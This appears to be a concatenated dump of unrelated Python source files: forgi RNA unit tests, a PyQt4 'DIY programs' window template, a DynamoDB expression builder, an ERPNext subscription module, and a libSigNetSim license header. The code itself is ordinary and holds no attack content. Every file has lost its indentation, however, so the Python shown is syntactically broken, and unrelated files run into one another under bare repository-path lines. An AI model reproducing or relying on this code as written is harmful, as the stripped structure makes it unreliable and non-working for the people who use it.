rog_vres = cg.radius_of_gyration(method="vres")
print(rog_fast, rog_vres, rog_fast - rog_vres, file=sys.stderr)
self.assertGreater(abs(rog_fast - rog_vres), 0, msg="Different methods for ROG calculation "
"producting the exactly same result? Something seems to be wrong.")
self.assertLess(abs(rog_fast - rog_vres), 3, msg="Different methods for ROG calculation "
"should produce roughly the same result.")
def test_radius_of_gyration_no_stems(self):
cg, = ftmc.CoarseGrainRNA.from_fasta_text("AUCG\n....")
cg.coords["f0"] = [0, 0, 0.], [12., 1, 1]
self.assertTrue(math.isnan(cg.radius_of_gyration()))
def test_get_sides(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1gid.cg')
self.check_graph_integrity(cg)
self.check_cg_integrity(cg)
log.info(cg.to_dotbracket_string())
log.info(cg.to_element_string(True))
# The file 1gid.cg still starts with f1, not f0
(s1b, s1e) = cg.get_sides('s0', 'f1')
(s1b, s1e) = cg.get_sides('s8', 't1')
'''
def test_cg_from_sg(self):
bg = ftmc.CoarseGrainRNA(
dotbracket_str='.(((((..(((.(((((((.((.((((..((((((....))))))..)))).)).))........(((((.....((((...((((....))))...))))...))))).))))).)))...)))))')
self.check_graph_integrity(bg)
# bg = cgb.BulgeGraph(dotbracket_str='.(((((........)))))..((((((((.(((.((...........((((((..(((((.((((((((..(((..)))...((((....)))).....))))))))..)))))................((((((...........))))))..((...(((((((...((((((..)))))).....((......))....)))))))...(((((((((.........))))))))).(((....))).))..........(((((.(((((.......))))))))))..........))))..))............(((.((((((((...((.......))...))))))..))))).........((((((((((((..(((((((((......))))))..))).((((.......)))).....)))))..))..))).))....((...............))....))..)))))))))))...')
for j in range(40):
sg = bg.random_subgraph()
new_cg = cg_from_sg(bg, sg)
for i in it.chain(new_cg.iloop_iterator(), new_cg.mloop_iterator()):
c = new_cg.connections(i)
if len(c) != 2:
self.assertEqual(len(c), 2)
'''
def test_get_stem_stats(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
cg.get_stem_stats("s0")
def test_get_angle_stats(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
for d in cg.defines:
if d[0] in "mi":
cg.get_bulge_angle_stats(d)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1byj.pdb')
for d in cg.defines:
if d[0] in "mi":
cg.get_bulge_angle_stats(d)
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2QBZ.pdb')
for d in cg.defines:
if d[0] in "mi":
cg.get_bulge_angle_stats(d)
def test_get_loop_stat(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
cg.get_loop_stat("h0")
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/4GXY_A.cg') # Contains a loop with r=0
self.check_graph_integrity(cg)
self.check_cg_integrity(cg)
cg.get_loop_stat('h3')
def test_length_one_stems(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1byj.pdb',
remove_pseudoknots=False)
self.check_graph_integrity(cg)
self.check_cg_integrity(cg)
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2QBZ.pdb',
remove_pseudoknots=False)
self.check_graph_integrity(cg)
self.check_cg_integrity(cg)
def test_pseudoknot(self):
#cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1ymo.pdb')
# self.check_graph_integrity(cg)
# self.check_cg_integrity(cg)
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/3D0U_A.cg')
self.check_graph_integrity(cg)
self.check_cg_integrity(cg)
cg.traverse_graph()
self.assertEqual(cg.get_angle_type("i3"), 1)
def test_small_molecule(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2X1F.pdb')
log.info(cg.to_dotbracket_string())
log.info(cg.to_element_string(True))
log.info("COORDS {}".format(cg.coords))
self.assertTrue('f0' in cg.coords)
def test_longrange_iterator(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
interactions = list(cg.longrange_iterator())
self.assertEqual(len(interactions), 4)
self.assertTrue(('i0', 's0') in interactions)
def test_longrange_distance(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
dist = cg.element_physical_distance('h0', 'h1')
self.assertTrue(dist < 10)
def test_total_length(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
self.assertEqual(cg.total_length(), cg.seq_length)
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2X1F.pdb')
self.assertEqual(cg.total_length(), cg.seq_length)
cg = ftmc.CoarseGrainRNA.from_dotbracket('..((..((...))..))..((..))..')
self.assertEqual(cg.total_length(), cg.seq_length)
self.assertEqual(cg.total_length(), 27)
def test_get_load_coordinates(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
coords = cg.get_coordinates_array()
new_cg = copy.deepcopy(cg)
for key in new_cg.coords:
new_cg.coords[key] = [0, 0, 0], [0, 0, 0]
new_cg.load_coordinates_array(coords)
for key in new_cg.coords:
for i in range(len(new_cg.coords[key])):
nptest.assert_allclose(new_cg.coords[key][i],
cg.coords[key][i])
"""
def test_is_stacking(self):
cg = ftmc.CoarseGrainRNA.from_bg_file('test/forgi/threedee/data/3way.cg')
self.assertFalse(cg.is_stacking("m0")) #Distance
self.assertFalse(cg.is_stacking("m1")) #distance
self.assertFalse(cg.is_stacking("m2")) #shear angle
def test_is_stacking2(self):
cg = ftmc.CoarseGrainRNA.from_bg_file('test/forgi/threedee/data/1I9V_noPK.cg')
self.assertFalse(cg.is_stacking("m0"))
self.assertFalse(cg.is_stacking("m2"))
self.assertTrue(cg.is_stacking("m1"))
"""
def test_coords_from_direction(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1I9V_noPK.cg')
cg_old = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1I9V_noPK.cg')
coords = cg.get_coordinates_array()
directions = coords[1::2] - coords[0::2]
cg._init_coords()
cg.coords_from_directions(directions)
# self.assertAlmostEqual(ftme.cg_rmsd(cg, cg_old), 0) #This only looks at stems
# The coordinates should be the same as before except for a constant offset
new_coords = cg.get_coordinates_array()
offset = (coords - new_coords)
print(offset)
# I use allclose, because it uses broadcasting
assert np.allclose(offset, offset[0])
def test_coords_from_direction_with_pseudoknot(self):
# This tests the case where the link is inserted from reverse direction.
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/3D0U_A.cg')
cg_old = copy.deepcopy(cg)
coords = cg.get_coordinates_array()
directions = cg.coords_to_directions()
cg._init_coords()
cg.twists = cg_old.twists
log.info("len(coords):{}, len(directions):{}, len(defines):{}".format(
len(coords), len(directions), len(cg.defines)))
cg.coords_from_directions(directions)
self.assertLess(ftme.cg_rmsd(cg, cg_old), 10**-6)
new_coords = cg.get_coordinates_array()
offset = (coords - new_coords)
assert np.allclose(offset, offset[0])
@unittest.skip("It is hard to do the subgraph thing correctly in a way consistent with the RNA model. Thus it has been disabled in the current release!")
def test_cg_from_sg_invalid_subgraph_breaking_m(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/3D0U_A.cg')
"""
/s3 --h1
m1 |
/ |
s0 m2
\ |
m0 |
\s1--i0--s2--h0
"""
split_ml = ["s0", "m0", "s1"]
with self.assertRaises(Exception):
ftmc.cg_from_sg(cg, split_ml)
@unittest.skip("It is hard to do the subgraph thing correctly in a way consistent with the RNA model. Thus it has been disabled in the current release!")
def test_cg_from_sg_breaking_after_i(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/3D0U_A.cg')
"""
/s3 --h1
m1 |
/ |
s0 m2
\ |
m0 |
\s1--i0--s2--h0
"""
split_ml = ["s0", "m0", "s1", "m2", "s3", "m1", "h1", "i0"]
sg = ftmc.cg_from_sg(cg, split_ml)
self.check_graph_integrity(sg)
@unittest.skip("It is hard to do the subgraph thing correctly in a way consistent with the RNA model. Thus it has been disabled in the current release!")
def test_cg_from_sg_breaking_after_s(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/3D0U_A.cg')
"""
/s3 --h1
m1 |
/ |
s0 m2
\ |
m0 |
\s1--i0--s2--h0
"""
split_ml = ["s0", "m0", "s1", "m2", "s3", "m1", "h1"]
sg = ftmc.cg_from_sg(cg, split_ml)
self.check_graph_integrity(sg)
class TestVirtualAtoms(unittest.TestCase):
def setUp(self):
self.longMessage = True
@unittest.skip("This test currently fails. Should be fixed in version 0.5")
def test_virtual_atoms_only_single_stranded(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2X1F.pdb')
va = cg.virtual_atoms(1)
self.assertIn("C1'", va) # C1' should be always present
def test_virtual_atoms_stem_distance_to_pairing_partner(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
va1 = cg.virtual_atoms(1)
va2 = cg.virtual_atoms(cg.pairing_partner(1))
self.assertLess(ftuv.vec_distance(
va1["C1'"], va2["C1'"]), 25, msg="Virtual atoms too far apart")
self.assertGreater(ftuv.vec_distance(
va1["C1'"], va2["C1'"]), 8, msg="Virtual atoms too close")
def test_virtual_atoms_stem_distance_to_stacked_base(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
va1 = cg.virtual_atoms(1)
va2 = cg.virtual_atoms(2)
self.assertLess(ftuv.vec_distance(
va1["C1'"], va2["C1'"]), 10, msg="Virtual atoms too far apart")
self.assertGreater(ftuv.vec_distance(
va1["C1'"], va2["C1'"]), 2, msg="Virtual atoms too close")
def test_virtuel_atom_caching_is_reset(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
va_old = cg.virtual_atoms(1)["C1'"]
# Stay orthogonal to twists
cg.coords["s0"] = cg.coords["s0"][0] + \
(cg.coords["s0"][1] - cg.coords["s0"][0]) * 0.5, cg.coords["s0"][1]
va_new = cg.virtual_atoms(1)["C1'"]
self.assertTrue(np.any(np.not_equal(va_old, va_new)),
msg="A stale virtual atom position was used.")
class RotationTranslationTest(unittest.TestCase):
def setUp(self):
self.cg1 = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.cg2, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1byj.pdb')
def test_rotate_keeps_RMSD_zero0(self):
cg1_rot = copy.deepcopy(self.cg1)
cg1_rot.rotate(30, unit="degrees")
cg1_rot.rotate(-30, unit="degrees")
self.assertLess(ftme.cg_rmsd(self.cg1, cg1_rot), 10**-6)
def test_rotate_keeps_RMSD_zero(self):
cg1_rot = copy.deepcopy(self.cg1)
cg1_rot.rotate(30, unit="degrees")
# This currently uses virtual atoms, thus takes twists into account.
self.assertLess(ftme.cg_rmsd(self.cg1, cg1_rot), 10**-6)
cg2_rot = copy.deepcopy(self.cg2)
cg2_rot.rotate(45, unit="degrees")
a,b = self.cg2.get_ordered_virtual_residue_poss(True)
log.warning("------------------------")
c,d = cg2_rot.get_ordered_virtual_residue_poss(True)
c2 = np.dot(c, ftuv.rotation_matrix("x", math.radians(-45)).T)
log.warning("==================================")
for i, coord in enumerate(a):
if any(abs(coord-c2[i])>10**-4):
log.warning("%s %s %s %s",coord, b[i], c2[i], d[i])
self.assertLess(ftme.cg_rmsd(self.cg2, cg2_rot), 10**-6)
class StericValueTest(unittest.TestCase):
def setUp(self):
self.cg1 = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
self.cg2, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1byj.pdb')
@unittest.skip("Manual test")
def test_stericValue_1(self):
print("m0, m1, m2", self.cg1.steric_value(["m0", "m1", "m2"]))
from_ = np.amin(self.cg1.coords._coordinates)
to_ = np.amax(self.cg1.coords._coordinates)
x, y, z = np.mgrid[from_:to_:4, from_:to_:4, from_:to_:4]
from mayavi import mlab
s = np.zeros_like(x)
for i, j, k in np.ndindex(x.shape):
s[i, j, k] = self.cg1.steric_value(
np.array([x[i, j, k], y[i, j, k], z[i, j, k]]), "r**-3")
#mlab.contour3d(x,y,z,s, contours= [0.5, 1, 2, 5], opacity=0.3)
src = mlab.pipeline.scalar_field(x, y, z, s)
mlab.pipeline.volume(src)
#mlab.pipeline.iso_surface(src, contours=[0.1, ], opacity=0.3)
#mlab.pipeline.iso_surface(src, contours=[0.5, ], opacity=0.7)
#mlab.pipeline.iso_surface(src, contours=[1, ])
colors = {"s": (0, 1, 0), "h": (0, 0, 1), "m": (1, 0, 0), "i": (
1, 1, 0), "f": (0.5, 0.5, 0.5), "t": (0.5, 0.5, 0.5)}
for d in self.cg1.defines:
x = self.cg1.coords[d][0][0], self.cg1.coords[d][1][0]
y = self.cg1.coords[d][0][1], self.cg1.coords[d][1][1]
z = self.cg1.coords[d][0][2], self.cg1.coords[d][1][2]
mlab.plot3d(x, y, z, tube_radius=2, color=colors[d[0]])
mlab.show()
assert False
|
jithinbp/pslab-desktop-apps
|
psl_res/GUI/E_MISCELLANEOUS/B/templates/hackYourOwn.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'hackYourOwn.ui'
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(718, 475)
MainWindow.setMinimumSize(QtCore.QSize(370, 0))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.SCF2 = QtGui.QWidget(MainWindow)
self.SCF2.setStyleSheet(_fromUtf8(""))
self.SCF2.setObjectName(_fromUtf8("SCF2"))
self.horizontalLayout = QtGui.QHBoxLayout(self.SCF2)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.frame = QtGui.QFrame(self.SCF2)
self.frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame.setFrameShadow(QtGui.QFrame.Raised)
self.frame.setObjectName(_fromUtf8("frame"))
self.WidgetLayout = QtGui.QVBoxLayout(self.frame)
self.WidgetLayout.setSpacing(0)
self.WidgetLayout.setMargin(0)
self.WidgetLayout.setObjectName(_fromUtf8("WidgetLayout"))
self.pushButton = QtGui.QPushButton(self.frame)
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.WidgetLayout.addWidget(self.pushButton)
self.horizontalLayout.addWidget(self.frame)
self.scrollArea_4 = QtGui.QScrollArea(self.SCF2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.scrollArea_4.sizePolicy().hasHeightForWidth())
self.scrollArea_4.setSizePolicy(sizePolicy)
self.scrollArea_4.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.scrollArea_4.setStyleSheet(_fromUtf8(""))
self.scrollArea_4.setWidgetResizable(True)
self.scrollArea_4.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.scrollArea_4.setObjectName(_fromUtf8("scrollArea_4"))
self.SCF1 = QtGui.QWidget()
self.SCF1.setGeometry(QtCore.QRect(0, 0, 532, 473))
self.SCF1.setStyleSheet(_fromUtf8(""))
self.SCF1.setObjectName(_fromUtf8("SCF1"))
self.gridLayout_5 = QtGui.QGridLayout(self.SCF1)
self.gridLayout_5.setMargin(0)
self.gridLayout_5.setSpacing(0)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.frame_5 = QtGui.QFrame(self.SCF1)
self.frame_5.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_5.setFrameShadow(QtGui.QFrame.Raised)
self.frame_5.setObjectName(_fromUtf8("frame_5"))
self.gridLayout_7 = QtGui.QGridLayout(self.frame_5)
self.gridLayout_7.setSpacing(5)
self.gridLayout_7.setContentsMargins(0, 5, 0, 0)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.ExperimentLayout = QtGui.QGridLayout()
self.ExperimentLayout.setMargin(5)
self.ExperimentLayout.setSpacing(7)
self.ExperimentLayout.setObjectName(_fromUtf8("ExperimentLayout"))
self.gridLayout_7.addLayout(self.ExperimentLayout, 1, 0, 1, 1)
self.gridLayout_5.addWidget(self.frame_5, 0, 0, 1, 1)
self.scrollArea_4.setWidget(self.SCF1)
self.horizontalLayout.addWidget(self.scrollArea_4)
self.horizontalLayout.setStretch(0, 1)
self.horizontalLayout.setStretch(1, 3)
MainWindow.setCentralWidget(self.SCF2)
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.run)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "DIY programs", None))
self.pushButton.setToolTip(_translate("MainWindow", "run the code", None))
self.pushButton.setText(_translate("MainWindow", "Run", None))
self.SCF1.setProperty("class", _translate("MainWindow", "PeripheralCollectionInner", None))
self.frame_5.setToolTip(_translate("MainWindow", "Widgets specific to detected sensors will be displayed\n"
"here after you click the button below", None))
|
gusibi/dynamodb-py
|
dynamodb/expression.py
|
# -*- coding: utf-8 -*-
'''
DynamoDB KeyConditionExpression and FilterExpression
http://boto3.readthedocs.io/en/stable/reference/customizations/dynamodb.html#ref-dynamodb-conditions
'''
from __future__ import print_function
from decimal import Decimal
from boto3.dynamodb.conditions import Key, Attr
from .errors import ValidationException
from .helpers import smart_unicode
__all__ = ['Expression']
class Expression(object):
def set(self, value,
set_path=None,
attr_label=None,
if_not_exists=None,
list_append=None):
'''
parameters:
- value: value
- set_path: attr path if not use attr name
- attr_label: string attr label ex: label=':p'
- if_not_exists: string path ex: Price
- list_append: (tuple) path, index
ex: (#pr.FiveStar, -1) to last
(#pr.FiveStar, 0) to first
examples:
Test(realname='gs', score=100).update(Test.order_score.set(100))
Test(realname='gs', score=100).update(
Test.order_score.set(5, label=':p')
Test(realname='gs', score=100).update(
Test.order_score.set(100, is_not_exists=('order_score', 50)))
Test(realname='gs', score=100).update(
Test.ids.set(100, list_append=('ids')))
or
Test(realname='gs', score=100).update(
Test.ids.list_append(100))
return exp, {label: value}
'''
path = attr_label or self.name
label = ":{name}".format(name=path)
attr_name = "#{name}".format(name=path)
# ExpressionAttributeValues
if isinstance(value, float) or self.use_decimal_types:
value = Decimal(str(value))
eav = {label: value}
ean = {}
if if_not_exists:
no_path, operand = if_not_exists, value
if isinstance(operand, float):
operand = Decimal(str(operand))
eav[label] = operand
ean[attr_name] = path
exp = '{name} = if_not_exists({path}, {label})'.format(
name=attr_name, path=no_path, label=label)
elif list_append:
list_path, index = list_append
if index == 0:
exp = "{path} = list_append({label}, {path})".format(
path=list_path, label=label)
elif index == -1:
exp = "{path} = list_append({path}, {label})".format(
path=list_path, label=label)
else:
raise ValidationException('index error')
else:
path = set_path or self.name
attr_name = "#{name}".format(name=attr_label or path)
ean[attr_name] = path
exp = '{path} = {label}'.format(path=attr_name, label=label)
exp_attr = {
'name': ean,
'value': eav
}
return exp, exp_attr, 'SET'
def list_append(self, value, path=None, index=-1,
attr_label=None):
path = attr_label or path or self.name
label = ":{name}".format(name=path)
attr_name = "#{name}".format(name=path)
if index == 0:
exp = "{path} = list_append({label}, {path})".format(
path=attr_name, label=label)
elif index == -1:
exp = "{path} = list_append({path}, {label})".format(
path=attr_name, label=label)
else:
raise ValidationException('index error')
exp_attr = {
'value': {label: value},
'name': {attr_name: path}
}
return exp, exp_attr, 'SET'
def remove(self, path=None, indexes=None):
'''
parameters:
path: attr path
index: (list) index ex: [2, 4]
'''
exp = ''
path = path or self.name
attr_name = "#{name}".format(name=path)
ean = {attr_name: path}
if self.field_type == 'list':
for index in indexes:
sub_exp = '{name}[{index}]'.format(name=attr_name,
index=index)
if not exp:
exp = '{sub_exp}'.format(sub_exp=sub_exp)
else:
exp = '{exp}, {sub_exp}'.format(exp=exp,
sub_exp=sub_exp)
return exp, {'name': ean}, 'REMOVE'
else:
exp = '{path}'.format(path=path)
return exp, {}, 'REMOVE'
def add(self, value, path=None, attr_label=None):
'''
support num and set
ADD Price :n price += n
ADD Color :c
'''
if self.field_type not in ('integer', 'float', 'set', 'dict'):
raise ValidationException('Incorrect data type, only [integer, float, set, dict]')
exp_attr = {}
if not path:
attr_name = "#{name}".format(name=attr_label or self.name)
exp_attr['name'] = {attr_name: self.name}
else:
attr_name = attr_label or path
label = ":{name}".format(name=self.name)
exp = '{name} {label}'.format(name=attr_name, label=label)
exp_attr['value'] = {label: value}
return exp, exp_attr, 'ADD'
def typecast_for_storage(self, value):
return smart_unicode(value)
def _expression_func(self, op, *values, **kwargs):
# for use by index ... bad
values = map(self.typecast_for_storage, values)
self.op = op
self.express_args = values
use_key = kwargs.get('use_key', False)
if self.hash_key and op != 'eq':
raise ValidationException('Query key condition not supported')
elif self.hash_key or self.range_key or use_key:
use_key = True
func = getattr(Key(self.name), op, None)
else:
func = getattr(Attr(self.name), op, None)
if not func:
raise ValidationException('Query key condition not supported')
return self, func(*values), use_key
def _expression(self, op, value):
if self.use_decimal_types:
value = Decimal(str(value))
label = ':%s' % self.name
exp = '{name} {op} {value}'.format(name=self.name, op=op, value=label)
return exp, label, value
def eq(self, value): # ==
# Creates a condition where the attribute is equal to the value.
# Attr & Key
return self._expression_func('eq', value)
def ne(self, value): # !=
# Creates a condition where the attribute is not equal to the value
# Attr
return self._expression_func('ne', value)
def lt(self, value): # <
# Creates a condition where the attribute is less than the value.
# Attr & Key
return self._expression_func('lt', value)
def lte(self, value): # <=
# Creates a condition where the attribute is less than or
# equal to the value.
# Attr & Key
return self._expression_func('lte', value)
def gt(self, value): # >
# Creates a condition where the attribute is greater than the value.
# Attr & Key
return self._expression_func('gt', value)
def gte(self, value): # >=
# Creates a condition where the attribute is greater than or equal to
# the value.
# Attr & Key
return self._expression_func('gte', value)
def between(self, low_value, high_value):
# Creates a condition where the attribute is greater than or equal to
# the low value and less than or equal to the high value.
# Attr & Key
return self._expression_func('between', low_value, high_value)
def begins_with(self, value):
# Creates a condition where the attribute begins with the value
# Attr & Key
return self._expression_func('begins_with', value)
def is_in(self, value):
# Creates a condition where the attribute is in the value
# Attr
if self.hash_key or self.range_key:
# ValidationException
raise ValidationException('Query key condition not supported')
return self.name, Attr(self.name).is_in(value), False
def contains(self, value):
# Creates a condition where the attribute contains the value.
# Attr
if self.hash_key or self.range_key:
# ValidationException
raise ValidationException('Query key condition not supported')
return self.name, Attr(self.name).contains(value), False
def exists(self):
# Creates a condition where the attribute exists.
# Attr
if self.hash_key or self.range_key:
# ValidationException
raise ValidationException('Query key condition not supported')
return self.name, Attr(self.name).exists(), False
def not_exists(self):
# Creates a condition where the attribute does not exists.
# Attr
if self.hash_key or self.range_key:
# ValidationException
raise ValidationException('Query key condition not supported')
return self.name, Attr(self.name).not_exists(), False
|
mbauskar/erpnext
|
erpnext/subscription/doctype/subscription/subscription.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
import calendar
from frappe import _
from frappe.desk.form import assign_to
from dateutil.relativedelta import relativedelta
from frappe.utils.user import get_system_managers
from frappe.utils import cstr, getdate, split_emails, add_days, today
from frappe.model.document import Document
month_map = {'Monthly': 1, 'Quarterly': 3, 'Half-yearly': 6, 'Yearly': 12}
class Subscription(Document):
def validate(self):
self.update_status()
self.validate_dates()
self.validate_next_schedule_date()
self.validate_email_id()
def before_submit(self):
self.set_next_schedule_date()
def on_submit(self):
self.update_subscription_id()
def on_update_after_submit(self):
self.validate_dates()
self.set_next_schedule_date()
def validate_dates(self):
if self.end_date and getdate(self.start_date) > getdate(self.end_date):
frappe.throw(_("End date must be greater than start date"))
def validate_next_schedule_date(self):
if self.repeat_on_day and self.next_schedule_date:
next_date = getdate(self.next_schedule_date)
if next_date.day != self.repeat_on_day:
# if the repeat day is the last day of the month (31)
# and the current month does not have as many days,
# then the last day of the current month is a valid date
lastday = calendar.monthrange(next_date.year, next_date.month)[1]
if self.repeat_on_day < lastday:
# the specified day of the month is not same as the day specified
# or the last day of the month
frappe.throw(_("Next Date's day and Repeat on Day of Month must be equal"))
def validate_email_id(self):
if self.notify_by_email:
if self.recipients:
email_list = split_emails(self.recipients.replace("\n", ""))
from frappe.utils import validate_email_add
for email in email_list:
if not validate_email_add(email):
frappe.throw(_("{0} is an invalid email address in 'Recipients'").format(email))
else:
frappe.throw(_("'Recipients' not specified"))
def set_next_schedule_date(self):
self.next_schedule_date = get_next_schedule_date(self.start_date,
self.frequency, self.repeat_on_day)
def update_subscription_id(self):
doc = frappe.get_doc(self.reference_doctype, self.reference_document)
if not doc.meta.get_field('subscription'):
frappe.throw(_("Add custom field Subscription Id in the doctype {0}").format(self.reference_doctype))
doc.db_set('subscription', self.name)
def update_status(self):
self.status = {
'0': 'Draft',
'1': 'Submitted',
'2': 'Cancelled'
}[cstr(self.docstatus or 0)]
def get_next_schedule_date(start_date, frequency, repeat_on_day):
mcount = month_map.get(frequency)
if mcount:
next_date = get_next_date(start_date, mcount, repeat_on_day)
else:
days = 7 if frequency == 'Weekly' else 1
next_date = add_days(start_date, days)
return next_date
def make_subscription_entry(date=None):
date = date or today()
for data in get_subscription_entries(date):
schedule_date = getdate(data.next_schedule_date)
while schedule_date <= getdate(today()):
create_documents(data, schedule_date)
schedule_date = get_next_schedule_date(schedule_date,
data.frequency, data.repeat_on_day)
if schedule_date:
frappe.db.set_value('Subscription', data.name, 'next_schedule_date', schedule_date)
def get_subscription_entries(date):
return frappe.db.sql(""" select * from `tabSubscription`
where docstatus = 1 and next_schedule_date <=%s
and reference_document is not null and reference_document != ''
and next_schedule_date <= ifnull(end_date, '2199-12-31')
and ifnull(disabled, 0) = 0""", (date), as_dict=1)
def create_documents(data, schedule_date):
try:
doc = make_new_document(data, schedule_date)
if data.notify_by_email:
send_notification(doc, data.print_format, data.recipients)
frappe.db.commit()
except Exception:
frappe.db.rollback()
frappe.db.begin()
frappe.log_error(frappe.get_traceback())
frappe.db.commit()
if data.reference_document and not frappe.flags.in_test:
notify_error_to_user(data)
def notify_error_to_user(data):
party = ''
party_type = ''
if data.reference_doctype in ['Sales Order', 'Sales Invoice', 'Delivery Note']:
party_type = 'customer'
elif data.reference_doctype in ['Purchase Order', 'Purchase Invoice', 'Purchase Receipt']:
party_type = 'supplier'
if party_type:
party = frappe.db.get_value(data.reference_doctype, data.reference_document, party_type)
notify_errors(data.reference_document, data.reference_doctype, party, data.owner)
def make_new_document(args, schedule_date):
doc = frappe.get_doc(args.reference_doctype, args.reference_document)
new_doc = frappe.copy_doc(doc, ignore_no_copy=False)
update_doc(new_doc, doc , args, schedule_date)
new_doc.insert(ignore_permissions=True)
if args.submit_on_creation:
new_doc.submit()
return new_doc
def update_doc(new_document, reference_doc, args, schedule_date):
new_document.docstatus = 0
if new_document.meta.get_field('set_posting_time'):
new_document.set('set_posting_time', 1)
if new_document.meta.get_field('subscription'):
new_document.set('subscription', args.name)
new_document.run_method("on_recurring", reference_doc=reference_doc, subscription_doc=args)
for data in new_document.meta.fields:
if data.fieldtype == 'Date' and data.reqd:
new_document.set(data.fieldname, schedule_date)
def get_next_date(dt, mcount, day=None):
dt = getdate(dt)
dt += relativedelta(months=mcount, day=day)
return dt
def send_notification(new_rv, print_format='Standard', recipients=None):
"""Notify concerned persons about recurring document generation"""
recipients = recipients or new_rv.notification_email_address
print_format = print_format or new_rv.recurring_print_format
frappe.sendmail(recipients,
subject= _("New {0}: #{1}").format(new_rv.doctype, new_rv.name),
message = _("Please find attached {0} #{1}").format(new_rv.doctype, new_rv.name),
attachments = [frappe.attach_print(new_rv.doctype, new_rv.name, file_name=new_rv.name, print_format=print_format)])
def notify_errors(doc, doctype, party, owner):
recipients = get_system_managers(only_name=True)
frappe.sendmail(recipients + [frappe.db.get_value("User", owner, "email")],
subject="[Urgent] Error while creating recurring %s for %s" % (doctype, doc),
message = frappe.get_template("templates/emails/recurring_document_failed.html").render({
"type": doctype,
"name": doc,
"party": party or ""
}))
assign_task_to_owner(doc, doctype, "Recurring Invoice Failed", recipients)
def assign_task_to_owner(doc, doctype, msg, users):
for d in users:
args = {
'assign_to' : d,
'doctype' : doctype,
'name' : doc,
'description' : msg,
'priority' : 'High'
}
assign_to.add(args)
@frappe.whitelist()
def make_subscription(doctype, docname):
doc = frappe.new_doc('Subscription')
doc.reference_doctype = doctype
doc.reference_document = docname
return doc
|
vincent-noel/libSigNetSim
|
libsignetsim/model/sbml/RuledVariable.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel (vincent.noel@butantan.gov.br)
#
# This file is part of libSigNetSim.
#
